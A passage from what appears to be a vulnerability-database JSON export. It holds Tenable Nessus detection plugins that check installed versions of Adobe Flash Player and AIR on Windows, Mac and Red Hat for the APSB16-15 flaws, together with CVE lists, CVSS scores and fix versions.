value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/05/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/05/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/05/16\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:adobe:flash_player\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"flash_player_installed.nasl\");\n script_require_keys(\"SMB/Flash_Player/installed\");\n\n exit(0);\n}\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/Flash_Player/installed\");\n\n# Identify vulnerable versions.\ninfo = \"\";\nvariants = make_list(\n \"Plugin\",\n \"ActiveX\",\n \"Chrome\",\n \"Chrome_Pepper\"\n);\n\n# we're checking for versions less than *or equal to* the cutoff!\nforeach variant (variants)\n{\n vers = get_kb_list(\"SMB/Flash_Player/\"+variant+\"/Version/*\");\n files = get_kb_list(\"SMB/Flash_Player/\"+variant+\"/File/*\");\n\n if(isnull(vers) || isnull(files))\n continue;\n\n foreach key (keys(vers))\n {\n ver = vers[key];\n if(isnull(ver))\n continue;\n\n vuln = FALSE;\n\n # Chrome Flash <= 21.0.0.216\n if(variant == \"Chrome_Pepper\" &&\n ver_compare(ver:ver,fix:\"21.0.0.216\",strict:FALSE) <= 0\n ) vuln = TRUE;\n\n # <= 18.0.0.343\n if(variant != \"Chrome_Pepper\" &&\n ver_compare(ver:ver,fix:\"18.0.0.343\",strict:FALSE) <= 0\n ) vuln = TRUE;\n\n # 19 <= 21.0.0.241\n else if(variant != \"Chrome_Pepper\" && ver =~ \"^(?:19|[2-9]\\d)\\.\")\n {\n if (variant == \"ActiveX\" && ver_compare(ver:ver,fix:\"21.0.0.241\",strict:FALSE) <= 0)\n vuln = TRUE;\n else if (ver_compare(ver:ver,fix:\"21.0.0.226\",strict:FALSE) <= 0)\n vuln = TRUE;\n }\n\n if(vuln)\n {\n num = key - (\"SMB/Flash_Player/\"+variant+\"/Version/\");\n file = files[\"SMB/Flash_Player/\"+variant+\"/File/\"+num];\n if (variant == \"Plugin\")\n {\n info += '\\n Product : Browser Plugin (for Firefox / Netscape / Opera)';\n fix = \"21.0.0.242 / 18.0.0.352\";\n }\n else if (variant == \"ActiveX\")\n {\n info += '\\n Product : ActiveX control (for Internet Explorer)';\n fix = \"21.0.0.242 / 18.0.0.352\";\n }\n else if (\"Chrome\" >< variant)\n {\n info += '\\n Product : Browser Plugin (for Google Chrome)';\n if(variant == \"Chrome\")\n fix = \"Upgrade to a version of Google Chrome running Flash Player 21.0.0.242\";\n }\n info += '\\n Path : ' + file +\n '\\n Installed version : ' + ver;\n if (variant == \"Chrome_Pepper\")\n info += '\\n Fixed version : 21.0.0.242 (Chrome PepperFlash)';\n else if(!isnull(fix))\n info += '\\n Fixed version : '+fix;\n info += '\\n';\n }\n }\n}\n\nif (info)\n{\n port = get_kb_item(\"SMB/transport\");\n if (!port) port = 445;\n\n if (report_verbosity > 0) security_hole(port:port, extra:info);\n else security_hole(port);\n}\nelse\n{\n if (thorough_tests)\n exit(0, 'No vulnerable versions of Adobe Flash Player were found.');\n else\n exit(1, 'Google Chrome\\'s built-in Flash Player may not have been detected because the \\'Perform thorough tests\\' setting was not enabled.');\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-18T15:12:06", "description": "The version of Adobe Flash Player installed on the remote Mac OS X host is equal or prior to 21.0.0.226. It is, therefore, affected by multiple vulnerabilities :\n\n - Multiple type confusion errors exist that allow an attacker to execute arbitrary code. (CVE-2016-1105, CVE-2016-4117)\n\n - Multiple use-after-free errors exist that allow an attacker to execute arbitrary code. (CVE-2016-1097, CVE-2016-1106, CVE-2016-1107, CVE-2016-1108, CVE-2016-1109, CVE-2016-1110, CVE-2016-4108, CVE-2016-4110, CVE-2016-4121)\n\n - A heap buffer overflow condition exists that allows an attacker to execute arbitrary code. (CVE-2016-1101)\n\n - An unspecified buffer overflow exists that allows an attacker to execute arbitrary code. (CVE-2016-1103)\n\n - Multiple memory corruption issues exist that allow an attacker to execute arbitrary code. (CVE-2016-1096, CVE-2016-1098, CVE-2016-1099, CVE-2016-1100, CVE-2016-1102, CVE-2016-1104, CVE-2016-4109, CVE-2016-4111, CVE-2016-4112, CVE-2016-4113, CVE-2016-4114, CVE-2016-4115, CVE-2016-4120, CVE-2016-4160, CVE-2016-4161, CVE-2016-4162, CVE-2016-4163)\n\n - A flaw exists when loading dynamic-link libraries. An attacker can exploit this, via a specially crafted .dll file, to execute arbitrary code. (CVE-2016-4116)", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-05-16T00:00:00", "type": "nessus", "title": "Adobe Flash Player for Mac <= 21.0.0.226 Multiple Vulnerabilities (APSB16-15)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-1096", "CVE-2016-1097", "CVE-2016-1098", "CVE-2016-1099", "CVE-2016-1100", "CVE-2016-1101", "CVE-2016-1102", "CVE-2016-1103", "CVE-2016-1104", "CVE-2016-1105", "CVE-2016-1106", "CVE-2016-1107", "CVE-2016-1108", "CVE-2016-1109", "CVE-2016-1110", "CVE-2016-4108", "CVE-2016-4109", "CVE-2016-4110", "CVE-2016-4111", "CVE-2016-4112", "CVE-2016-4113", "CVE-2016-4114", "CVE-2016-4115", "CVE-2016-4116", "CVE-2016-4117", "CVE-2016-4120", "CVE-2016-4121", "CVE-2016-4160", "CVE-2016-4161", "CVE-2016-4162", "CVE-2016-4163"], "modified": "2022-03-08T00:00:00", "cpe": ["cpe:/a:adobe:flash_player"], "id": "MACOSX_FLASH_PLAYER_APSB16-15.NASL", "href": "https://www.tenable.com/plugins/nessus/91165", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(91165);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/03/08\");\n\n script_cve_id(\n \"CVE-2016-1096\",\n \"CVE-2016-1097\",\n \"CVE-2016-1098\",\n \"CVE-2016-1099\",\n \"CVE-2016-1100\",\n \"CVE-2016-1101\",\n \"CVE-2016-1102\",\n \"CVE-2016-1103\",\n \"CVE-2016-1104\",\n \"CVE-2016-1105\",\n \"CVE-2016-1106\",\n \"CVE-2016-1107\",\n \"CVE-2016-1108\",\n \"CVE-2016-1109\",\n \"CVE-2016-1110\",\n \"CVE-2016-4108\",\n \"CVE-2016-4109\",\n \"CVE-2016-4110\",\n \"CVE-2016-4111\",\n \"CVE-2016-4112\",\n \"CVE-2016-4113\",\n \"CVE-2016-4114\",\n \"CVE-2016-4115\",\n \"CVE-2016-4116\",\n \"CVE-2016-4117\",\n \"CVE-2016-4120\",\n \"CVE-2016-4121\",\n \"CVE-2016-4160\",\n \"CVE-2016-4161\",\n \"CVE-2016-4162\",\n \"CVE-2016-4163\"\n );\n script_bugtraq_id(90505);\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/03/24\");\n\n script_name(english:\"Adobe Flash Player for Mac <= 21.0.0.226 Multiple Vulnerabilities (APSB16-15)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Mac OS X host has a browser plugin installed that is\naffected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Adobe Flash Player installed on the remote Mac OS X\nhost is equal or prior to 21.0.0.226. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - Multiple type confusion errors exist that allow an\n attacker to execute arbitrary code. (CVE-2016-1105,\n CVE-2016-4117)\n\n - Multiple use-after-free errors exist that allow an\n attacker to execute arbitrary code. (CVE-2016-1097,\n CVE-2016-1106, CVE-2016-1107, CVE-2016-1108,\n CVE-2016-1109, CVE-2016-1110, CVE-2016-4108,\n CVE-2016-4110, CVE-2016-4121)\n\n - A heap buffer overflow condition exists that allows an\n attacker to execute arbitrary code. (CVE-2016-1101)\n\n - An unspecified buffer overflow exists that allows an\n attacker to execute arbitrary code. (CVE-2016-1103)\n\n - Multiple memory corruption issues exist that allow an\n attacker to execute arbitrary code. (CVE-2016-1096,\n CVE-2016-1098, CVE-2016-1099, CVE-2016-1100,\n CVE-2016-1102, CVE-2016-1104, CVE-2016-4109,\n CVE-2016-4111, CVE-2016-4112, CVE-2016-4113,\n CVE-2016-4114, CVE-2016-4115, CVE-2016-4120,\n CVE-2016-4160, CVE-2016-4161, CVE-2016-4162,\n CVE-2016-4163)\n\n - A flaw exists when loading dynamic-link libraries. An\n attacker can exploit this, via a specially crafted .dll\n file, to execute arbitrary code. (CVE-2016-4116)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb16-15.html\");\n # http://helpx.adobe.com/flash-player/kb/archived-flash-player-versions.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?0cb17c10\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Adobe Flash Player version 21.0.0.242 or later.\n\nAlternatively, Adobe has made version 18.0.0.352 available for those installs\nthat cannot be upgraded to the latest version\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2016-4117\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Flash Player DeleteRangeTimelineOperation Type-Confusion');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/05/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/05/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/05/16\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:adobe:flash_player\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"macosx_flash_player_installed.nasl\");\n script_require_keys(\"MacOSX/Flash_Player/Version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nversion = get_kb_item_or_exit(\"MacOSX/Flash_Player/Version\");\npath = get_kb_item_or_exit(\"MacOSX/Flash_Player/Path\");\n\nif (ver_compare(ver:version, fix:\"19.0.0.0\", strict:FALSE) >= 0)\n{\n cutoff_version = \"21.0.0.226\";\n fix = \"21.0.0.242\";\n}\nelse\n{\n cutoff_version = \"18.0.0.343\";\n fix = \"18.0.0.352\";\n}\n\n# we're checking for versions less than or equal to the cutoff!\nif (ver_compare(ver:version, fix:cutoff_version, strict:FALSE) <= 0)\n{\n if (report_verbosity > 0)\n {\n report =\n '\\n Path : ' + path +\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fix +\n '\\n';\n security_hole(port:0, extra:report);\n }\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_INST_PATH_NOT_VULN, \"Flash Player for Mac\", version, path);\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-18T15:17:28", "description": "The version of Adobe AIR installed on the remote Mac OS X host is prior or equal to version 21.0.0.198. It is, therefore, affected by multiple vulnerabilities :\n\n - Multiple type confusion errors exist that allow an attacker to execute arbitrary code. (CVE-2016-1105, CVE-2016-4117)\n\n - Multiple use-after-free errors exist that allow an attacker to execute arbitrary code. (CVE-2016-1097, CVE-2016-1106, CVE-2016-1107, CVE-2016-1108, CVE-2016-1109, CVE-2016-1110, CVE-2016-4108, CVE-2016-4110, CVE-2016-4121)\n\n - A heap buffer overflow condition exists that allows an attacker to execute arbitrary code. (CVE-2016-1101)\n\n - An unspecified buffer overflow exists that allows an attacker to execute arbitrary code. (CVE-2016-1103)\n\n - Multiple memory corruption issues exist that allow an attacker to execute arbitrary code. (CVE-2016-1096, CVE-2016-1098, CVE-2016-1099, CVE-2016-1100, CVE-2016-1102, CVE-2016-1104, CVE-2016-4109, CVE-2016-4111, CVE-2016-4112, CVE-2016-4113, CVE-2016-4114, CVE-2016-4115, CVE-2016-4120, CVE-2016-4160, CVE-2016-4161, CVE-2016-4162, CVE-2016-4163)\n\n - A flaw exists when loading dynamic-link libraries. An attacker can exploit this, via a specially crafted .dll file, to execute arbitrary code. (CVE-2016-4116)", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-05-16T00:00:00", "type": "nessus", "title": "Adobe AIR for Mac <= 21.0.0.198 Multiple Vulnerabilities (APSB16-15)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-1096", "CVE-2016-1097", "CVE-2016-1098", "CVE-2016-1099", "CVE-2016-1100", "CVE-2016-1101", "CVE-2016-1102", "CVE-2016-1103", "CVE-2016-1104", "CVE-2016-1105", "CVE-2016-1106", "CVE-2016-1107", "CVE-2016-1108", "CVE-2016-1109", "CVE-2016-1110", "CVE-2016-4108", "CVE-2016-4109", "CVE-2016-4110", "CVE-2016-4111", "CVE-2016-4112", "CVE-2016-4113", "CVE-2016-4114", "CVE-2016-4115", "CVE-2016-4116", "CVE-2016-4117", "CVE-2016-4120", "CVE-2016-4121", "CVE-2016-4160", "CVE-2016-4161", "CVE-2016-4162", "CVE-2016-4163"], "modified": "2022-03-08T00:00:00", "cpe": ["cpe:/a:adobe:air"], "id": "MACOSX_ADOBE_AIR_APSB16-15.NASL", "href": "https://www.tenable.com/plugins/nessus/91164", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(91164);\n script_version(\"1.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/03/08\");\n\n script_cve_id(\n \"CVE-2016-1096\",\n \"CVE-2016-1097\",\n \"CVE-2016-1098\",\n \"CVE-2016-1099\",\n \"CVE-2016-1100\",\n \"CVE-2016-1101\",\n \"CVE-2016-1102\",\n \"CVE-2016-1103\",\n \"CVE-2016-1104\",\n \"CVE-2016-1105\",\n \"CVE-2016-1106\",\n \"CVE-2016-1107\",\n \"CVE-2016-1108\",\n \"CVE-2016-1109\",\n \"CVE-2016-1110\",\n \"CVE-2016-4108\",\n \"CVE-2016-4109\",\n \"CVE-2016-4110\",\n \"CVE-2016-4111\",\n \"CVE-2016-4112\",\n \"CVE-2016-4113\",\n \"CVE-2016-4114\",\n \"CVE-2016-4115\",\n \"CVE-2016-4116\",\n \"CVE-2016-4117\",\n \"CVE-2016-4120\",\n \"CVE-2016-4121\",\n \"CVE-2016-4160\",\n \"CVE-2016-4161\",\n \"CVE-2016-4162\",\n \"CVE-2016-4163\"\n );\n script_bugtraq_id(90505);\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/03/24\");\n\n script_name(english:\"Adobe AIR for Mac <= 21.0.0.198 Multiple Vulnerabilities (APSB16-15)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Mac OS X host has a browser plugin installed that is\naffected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Adobe AIR installed on the remote Mac OS X host is\nprior or equal to version 21.0.0.198. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - Multiple type confusion errors exist that allow an\n attacker to execute arbitrary code. (CVE-2016-1105,\n CVE-2016-4117)\n\n - Multiple use-after-free errors exist that allow an\n attacker to execute arbitrary code. (CVE-2016-1097,\n CVE-2016-1106, CVE-2016-1107, CVE-2016-1108,\n CVE-2016-1109, CVE-2016-1110, CVE-2016-4108,\n CVE-2016-4110, CVE-2016-4121)\n\n - A heap buffer overflow condition exists that allows an\n attacker to execute arbitrary code. (CVE-2016-1101)\n\n - An unspecified buffer overflow exists that allows an\n attacker to execute arbitrary code. (CVE-2016-1103)\n\n - Multiple memory corruption issues exist that allow an\n attacker to execute arbitrary code. (CVE-2016-1096,\n CVE-2016-1098, CVE-2016-1099, CVE-2016-1100,\n CVE-2016-1102, CVE-2016-1104, CVE-2016-4109,\n CVE-2016-4111, CVE-2016-4112, CVE-2016-4113,\n CVE-2016-4114, CVE-2016-4115, CVE-2016-4120,\n CVE-2016-4160, CVE-2016-4161, CVE-2016-4162,\n CVE-2016-4163)\n\n - A flaw exists when loading dynamic-link libraries. An\n attacker can exploit this, via a specially crafted .dll\n file, to execute arbitrary code. (CVE-2016-4116)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb16-15.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Adobe AIR version 21.0.0.215 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2016-4117\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Flash Player DeleteRangeTimelineOperation Type-Confusion');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/05/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/05/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/05/16\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:adobe:air\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"macosx_adobe_air_installed.nasl\");\n script_require_keys(\"MacOSX/Adobe_AIR/Version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nkb_base = \"MacOSX/Adobe_AIR\";\nversion = get_kb_item_or_exit(kb_base+\"/Version\");\npath = get_kb_item_or_exit(kb_base+\"/Path\");\n\n# nb: we're checking for versions less than *or equal to* the cutoff!\ncutoff_version = '21.0.0.198';\nfixed_version_for_report = '21.0.0.215';\n\nif (ver_compare(ver:version, fix:cutoff_version, strict:FALSE) <= 0)\n{\n report =\n '\\n Path : ' + path +\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fixed_version_for_report +\n '\\n';\n security_report_v4(severity:SECURITY_HOLE, port:0, extra:report);\n exit(0);\n}\nelse audit(AUDIT_INST_PATH_NOT_VULN, \"Adobe AIR\", version, path);\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-18T15:11:12", "description": "An update for flash-plugin is now available for Red Hat Enterprise Linux 5 Supplementary and Red Hat Enterprise Linux 6 Supplementary.\n\nRed Hat Product Security has rated this update as having a security impact of Critical. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.\n\nThe flash-plugin package contains a Mozilla Firefox compatible Adobe Flash Player web browser plug-in.\n\nThis update upgrades Flash Player to version 11.2.202.621.\n\nSecurity Fix(es) :\n\n* This update fixes multiple vulnerabilities in Adobe Flash Player.\nThese vulnerabilities, detailed in the Adobe Security Bulletin listed in the References section, could allow an attacker to create a specially crafted SWF file that would cause flash-plugin to crash, execute arbitrary code, or disclose sensitive information when the victim loaded a page containing the malicious SWF content.\n(CVE-2016-1096, CVE-2016-1097, CVE-2016-1098, CVE-2016-1099, CVE-2016-1100, CVE-2016-1101, CVE-2016-1102, CVE-2016-1103, CVE-2016-1104, CVE-2016-1105, CVE-2016-1106, CVE-2016-1107, CVE-2016-1108, CVE-2016-1109, CVE-2016-1110, CVE-2016-4108, CVE-2016-4109, CVE-2016-4110, CVE-2016-4111, CVE-2016-4112, CVE-2016-4113, CVE-2016-4114, CVE-2016-4115, CVE-2016-4116, CVE-2016-4117)", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-05-16T00:00:00", "type": "nessus", "title": "RHEL 5 / 6 : flash-plugin (RHSA-2016:1079)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-1096", "CVE-2016-1097", "CVE-2016-1098", "CVE-2016-1099", "CVE-2016-1100", "CVE-2016-1101", "CVE-2016-1102", "CVE-2016-1103", "CVE-2016-1104", "CVE-2016-1105", "CVE-2016-1106", "CVE-2016-1107", "CVE-2016-1108", "CVE-2016-1109", "CVE-2016-1110", "CVE-2016-4108", "CVE-2016-4109", "CVE-2016-4110", "CVE-2016-4111", "CVE-2016-4112", "CVE-2016-4113", "CVE-2016-4114", "CVE-2016-4115", "CVE-2016-4116", "CVE-2016-4117", "CVE-2016-4120", "CVE-2016-4121", "CVE-2016-4160", "CVE-2016-4161", "CVE-2016-4162", "CVE-2016-4163"], "modified": "2022-03-08T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:flash-plugin", "cpe:/o:redhat:enterprise_linux:5", "cpe:/o:redhat:enterprise_linux:6"], "id": "REDHAT-RHSA-2016-1079.NASL", "href": "https://www.tenable.com/plugins/nessus/91156", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2016:1079. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(91156);\n script_version(\"2.26\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/03/08\");\n\n script_cve_id(\n \"CVE-2016-1096\",\n \"CVE-2016-1097\",\n \"CVE-2016-1098\",\n \"CVE-2016-1099\",\n \"CVE-2016-1100\",\n \"CVE-2016-1101\",\n \"CVE-2016-1102\",\n \"CVE-2016-1103\",\n \"CVE-2016-1104\",\n \"CVE-2016-1105\",\n \"CVE-2016-1106\",\n \"CVE-2016-1107\",\n \"CVE-2016-1108\",\n \"CVE-2016-1109\",\n \"CVE-2016-1110\",\n \"CVE-2016-4108\",\n \"CVE-2016-4109\",\n \"CVE-2016-4110\",\n \"CVE-2016-4111\",\n \"CVE-2016-4112\",\n \"CVE-2016-4113\",\n \"CVE-2016-4114\",\n \"CVE-2016-4115\",\n \"CVE-2016-4116\",\n \"CVE-2016-4117\",\n \"CVE-2016-4120\",\n \"CVE-2016-4121\",\n \"CVE-2016-4160\",\n \"CVE-2016-4161\",\n \"CVE-2016-4162\",\n \"CVE-2016-4163\"\n );\n script_xref(name:\"RHSA\", value:\"2016:1079\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/03/24\");\n\n script_name(english:\"RHEL 5 / 6 : flash-plugin (RHSA-2016:1079)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Red Hat host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"An update for flash-plugin is now available for Red Hat Enterprise\nLinux 5 Supplementary and Red Hat Enterprise Linux 6 Supplementary.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Critical. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nThe flash-plugin package contains a Mozilla Firefox compatible Adobe\nFlash Player web browser plug-in.\n\nThis update upgrades Flash Player to version 11.2.202.621.\n\nSecurity Fix(es) :\n\n* This update fixes multiple vulnerabilities in Adobe Flash Player.\nThese vulnerabilities, detailed in the Adobe Security Bulletin listed\nin the References section, could allow an attacker to create a\nspecially crafted SWF file that would cause flash-plugin to crash,\nexecute arbitrary code, or disclose sensitive information when the\nvictim loaded a page containing the malicious SWF content.\n(CVE-2016-1096, CVE-2016-1097, CVE-2016-1098, CVE-2016-1099,\nCVE-2016-1100, CVE-2016-1101, CVE-2016-1102, CVE-2016-1103,\nCVE-2016-1104, CVE-2016-1105, CVE-2016-1106, CVE-2016-1107,\nCVE-2016-1108, CVE-2016-1109, CVE-2016-1110, CVE-2016-4108,\nCVE-2016-4109, CVE-2016-4110, CVE-2016-4111, CVE-2016-4112,\nCVE-2016-4113, CVE-2016-4114, CVE-2016-4115, CVE-2016-4116,\nCVE-2016-4117)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb16-15.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://helpx.adobe.com/security/products/flash-player/apsa16-02.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/errata/RHSA-2016:1079\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2016-4109\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2016-1110\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2016-1098\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2016-1099\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2016-1096\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2016-1097\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2016-1108\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2016-1109\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2016-1104\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2016-1105\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2016-1106\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2016-1107\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2016-1100\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2016-1101\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2016-1102\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2016-1103\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2016-4114\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2016-4115\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2016-4116\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2016-4117\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2016-4110\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2016-4111\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2016-4112\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2016-4113\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2016-4108\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2016-4120\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2016-4121\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2016-4160\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2016-4161\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2016-4162\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2016-4163\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected flash-plugin package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n 